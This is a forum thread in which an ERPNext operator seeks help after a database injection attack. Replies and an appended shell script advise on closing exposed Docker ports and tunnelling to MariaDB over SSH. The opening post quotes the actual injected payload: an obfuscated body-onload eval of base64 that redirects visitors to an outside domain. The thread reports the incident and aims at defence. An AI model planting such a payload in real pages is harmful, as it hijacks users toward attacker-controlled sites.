Seeking Assistance After SQL Injection Attack on ERPNext

My ERPNext deployment was subjected to an SQL injection attack. The attacker was able to inject a malicious
<body/onload=e&#x76;&#x61;l&#x28;a&#x74;&#x6f;b&#x28;&#34;d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LnRvcHJldmVudWVnYXRlLmNvbS9jbmN0d2pkbj9rZXk9NzU0YTVmZGE2Mjk1N2M4MDc1NzdiOTEyYmFiOThlYzYiKQ==&#34;&#x29;&#x29;>

script into our MariaDB database, which redirected users to an unauthorized domain upon login. We identified and removed the malicious script from the tabFile table in the file_url field within MariaDB.

However, even after cleaning the database, the issue persists when switching to desk mode. Can anyone suggest how to fix this?

4 Likes

This is serious. What version are you on? Please give more details about your environment so that the framework team can assist you.

1 Like

Above is the Docker Compose file I have used; I have modified it according to my needs. I was using an EC2 instance to deploy this.

1 Like

Why are you publishing ports to the host? MariaDB 3306 and frontend 8080 are available for access? Are those ports protected by a firewall?

You should only publish ports 80 and 443 through nginx and reverse proxy everything else from the Docker network without exposing host ports.

1 Like

Port 8080 is opened in the security groups of the AWS EC2 instance. I enabled port 3306 in the security groups so that I can connect to MariaDB from a desktop database client like DBeaver.
Did the deployment become vulnerable because I exposed the ports?

1 Like

Hope your password is not admin and is a more secure one that cannot be guessed easily.

I would think leaving a database port open is asking for trouble. At the very least you should limit IP address access.

How about using ssh and a private key to manage your DBMS instead? Most database management tools should support that.

You don't need to expose those ports!

To connect to MySQL with DBeaver, just use the SSH tunnel connection!

It works like a charm for me!
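The two pieces of advice in this thread, publish only 80/443 through nginx and reach MariaDB over an SSH tunnel instead of an open 3306, as an added, runnable example. This is not code from any of the posts above nor from the ERPNext or frappe_docker projects. The service names (mariadb, frontend, nginx), image names, host name, key path and SSH user are assumptions for illustration, and both Compose files are constructed samples: the first reproduces the exposure described in the thread, the second is the corrected layout.

```shell
#!/bin/sh
# Added example for this thread; not from the original posts nor from ERPNext /
# frappe_docker. Service names, image names, host, key path and SSH user are
# assumptions.
#
# 1. list_published_ports / flag_unexpected_ports: read a Compose file and report
#    every host-published port that does not belong to the reverse proxy, treating
#    loopback-only bindings (127.0.0.1:...) as safe. This is the check behind
#    "only publish 80 and 443 through nginx".
# 2. db_tunnel_cmd: the ssh -L command that gives a desktop client such as DBeaver a
#    local port forwarded to MariaDB, so 3306 never needs to be opened in the EC2
#    security group. DBeaver's SSH tunnel tab does the same thing under the hood.

# Print one "service:binding" line per published port. Understands the usual short
# form ("- host:container" or "- ip:host:container", quoted or not) under a service
# at two-space indentation; it is not a full YAML parser.
list_published_ports() {
  awk '
    /^  [A-Za-z0-9_.-]+:[[:space:]]*$/ { svc=$1; sub(":$", "", svc); inports=0; next }
    /^    ports:/                        { inports=1; next }
    /^    [A-Za-z_]/                     { inports=0 }
    inports && /^      - / {
      p=$0
      sub(/^      - /, "", p)           # drop the list marker
      sub(/[[:space:]]*#.*$/, "", p)    # drop a trailing comment
      gsub(/"/, "", p)                  # drop quotes
      print svc ":" p
    }
  ' "$1"
}

# Print "EXPOSED: service:binding" for every host-published port that is neither on
# the proxy service ($2) nor bound to loopback. Returns 1 when anything was found.
flag_unexpected_ports() {
  compose="$1"; proxy="$2"; found=0
  for entry in $(list_published_ports "$compose"); do
    case "$entry" in
      "$proxy":*)                  ;;   # 80/443 on the reverse proxy are expected
      *:127.0.0.1:*|*:localhost:*) ;;   # host-only, e.g. reached through an SSH tunnel
      *) echo "EXPOSED: $entry"; found=1 ;;
    esac
  done
  return $found
}

# Build the tunnel command: local port $3 (default 3307) -> 127.0.0.1:3306 on the
# instance, authenticated with the private key $2. -N opens no remote shell.
db_tunnel_cmd() {
  host="$1"; key="$2"; local_port="${3:-3307}"; user="${4:-ubuntu}"
  printf 'ssh -i %s -N -L %s:127.0.0.1:3306 %s@%s\n' "$key" "$local_port" "$user" "$host"
}

# Constructed sample: the exposure pattern from the thread (3306 and 8080 published
# on every interface).
weak_compose() {
  cat <<'EOF'
services:
  mariadb:
    image: mariadb
    ports:
      - "3306:3306"
  frontend:
    image: example/erpnext-frontend
    ports:
      - "8080:8080"
  nginx:
    image: nginx
    ports:
      - "80:80"
      - "443:443"
EOF
}

# Constructed sample: the corrected layout. Only nginx publishes host ports, the
# frontend is reachable solely on the Docker network, and MariaDB is bound to
# loopback so the SSH tunnel can reach it but the internet cannot (dropping its
# ports: block entirely and tunnelling to the container address is tighter still).
hardened_compose() {
  cat <<'EOF'
services:
  mariadb:
    image: mariadb
    ports:
      - "127.0.0.1:3306:3306"   # loopback only
  frontend:
    image: example/erpnext-frontend
    expose:
      - "8080"                  # Docker network only; nginx proxies to it
  nginx:
    image: nginx
    ports:
      - "80:80"
      - "443:443"
EOF
}

# Stand-alone run: audit both samples, then show the tunnel command.
for mk in weak_compose hardened_compose; do
  f=$(mktemp); $mk > "$f"
  echo "== $mk"; flag_unexpected_ports "$f" nginx || echo "-> fix before deploying"
  rm -f "$f"
done
db_tunnel_cmd ec2-host.example ~/.ssh/erpnext.pem
```

Run the audit against your real compose file with `flag_unexpected_ports docker-compose.yml nginx` (or whatever your proxy service is called); a non-zero exit means a port is reachable from outside the Docker network and the matching EC2 security-group rule should go too. With the tunnel command running, point DBeaver at 127.0.0.1:3307 and nothing on 3306 needs to be open to the internet.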